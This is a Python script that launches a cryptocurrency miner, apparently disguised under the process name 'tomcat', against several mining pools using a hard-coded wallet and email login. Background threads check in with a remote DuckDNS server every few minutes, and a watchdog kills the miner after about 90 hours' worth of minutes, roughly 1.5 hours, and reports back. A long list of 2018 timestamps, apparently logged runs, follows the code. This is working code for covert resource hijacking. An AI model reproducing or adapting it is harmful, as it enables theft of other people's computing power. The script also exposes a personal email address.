import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:32:07.268199
#2018-02-17 17:20:04.213191
#2018-02-17 19:08:03.951509
#2018-02-17 20:57:07.049379
#2018-02-17 22:43:05.043886
#2018-02-18 00:26:07.662565
#2018-02-18 02:17:04.593913
#2018-02-18 04:04:01.278902
#2018-02-18 05:54:01.772465
#2018-02-18 07:45:07.498604
#2018-02-18 09:33:03.697446
#2018-02-18 11:19:01.362218
#2018-02-18 13:05:07.533432
#2018-02-18 14:52:03.788378
#2018-02-18 16:39:07.303650
#2018-02-18 18:28:04.885909
#2018-02-18 20:16:06.116015
#2018-02-18 22:01:05.117263
#2018-02-18 23:50:04.711314
#2018-02-19 01:36:07.955773
#2018-02-19 03:25:08.627569
#2018-02-19 05:10:08.171567
#2018-02-19 06:55:06.171945
#2018-02-19 08:44:04.325902
#2018-02-19 10:33:03.922458
#2018-02-19 12:22:05.580703
#2018-02-19 14:09:01.465050
#2018-02-19 15:58:10.231793
#2018-02-19 17:48:01.524404
#2018-02-19 19:34:05.046606
#2018-02-19 21:21:04.338026
#2018-02-19 23:07:01.690630
#2018-02-20 00:49:06.135592
#2018-02-20 02:39:06.177792
#2018-02-20 04:27:06.136711
#2018-02-20 06:11:05.621686
#2018-02-20 07:56:02.016583
#2018-02-20 09:41:01.640619
#2018-02-20 11:25:08.091962
#2018-02-20 13:13:07.904751
#2018-02-20 14:58:08.152512
#2018-02-20 16:42:13.217291
#2018-02-20 18:31:01.912468
#2018-02-20 20:22:05.806591
#2018-02-20 22:08:06.940237
#2018-02-20 23:49:07.592713
#2018-02-21 01:33:07.715086
#2018-02-21 03:21:06.522590
#2018-02-21 05:09:05.167659
#2018-02-21 06:56:05.641466
#2018-02-21 08:42:07.778262
#2018-02-21 10:29:09.876261
#2018-02-21 12:17:07.517409
#2018-02-21 14:04:08.525271
#2018-02-21 15:51:08.794601
#2018-02-21 17:42:04.163566
#2018-02-21 19:28:03.922169
#2018-02-21 21:16:05.944097
#2018-02-21 23:04:05.289636
#2018-02-22 00:51:06.915928
#2018-02-22 02:40:05.702261
#2018-02-22 04:27:06.393050
#2018-02-22 06:13:05.662482
#2018-02-22 07:57:01.844350
#2018-02-22 09:45:11.543080
#2018-02-22 11:30:01.415264
#2018-02-22 13:16:01.869041
#2018-02-22 15:05:01.736190
#2018-02-22 16:49:12.650660
#2018-02-22 18:38:01.515452
#2018-02-22 20:28:08.030130
#2018-02-22 22:15:08.820196
#2018-02-23 00:02:04.162930
#2018-02-23 01:52:04.458940
#2018-02-23 03:41:05.300451
#2018-02-23 05:26:08.171228
#2018-02-23 07:12:04.698664
#2018-02-23 09:17:07.454850
#2018-02-23 11:22:08.234414
#2018-02-23 13:12:01.527885
#2018-02-23 14:56:06.726539
#2018-02-23 16:44:07.253511
#2018-02-23 18:31:07.472907
#2018-02-23 20:19:06.021384
#2018-02-23 22:07:06.130497
#2018-02-23 23:55:01.683233
#2018-02-24 01:44:04.674199
#2018-02-24 03:36:07.690737
#2018-02-24 05:21:01.367844
#2018-02-24 07:09:04.814704
#2018-02-24 08:56:06.756439
#2018-02-24 10:54:01.370793
#2018-02-24 12:41:06.474097
#2018-02-24 14:29:06.912074
#2018-02-24 16:17:06.175851
#2018-02-24 18:11:01.560518
#2018-02-24 19:56:07.782387
#2018-02-24 21:40:09.078684
#2018-02-25 00:35:08.117188
#2018-02-25 04:13:06.942612
#2018-02-25 07:45:07.608331